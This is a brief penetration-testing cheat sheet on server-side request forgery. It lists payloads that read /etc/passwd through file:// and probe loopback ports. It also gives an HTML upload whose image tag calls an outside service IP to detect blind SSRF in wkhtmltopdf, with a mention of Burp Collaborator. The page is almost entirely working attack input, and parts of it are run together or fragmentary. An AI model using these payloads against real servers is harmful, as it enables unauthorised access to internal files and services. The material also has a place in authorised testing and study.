Server Side Request Forgery (SSRF)
Basic SSRF payloads
file:///etc/passwd
http://127.0.0.1
http://127.0.0.1:5000
http://127.0.0.1:1
index.html
index.php
http::////127.0.0.1:1Blind SSRF
HTML File Upload To SSRF
<!DOCTYPE html>
<html>
<body>
<a>Hello World!</a>
<img src="http://<SERVICE IP>:PORT/x?=viaimgtag">
</body>
</html>

Using Burp Collaborator
wkhtmltopdf Blind SSRF Exploit

Last updated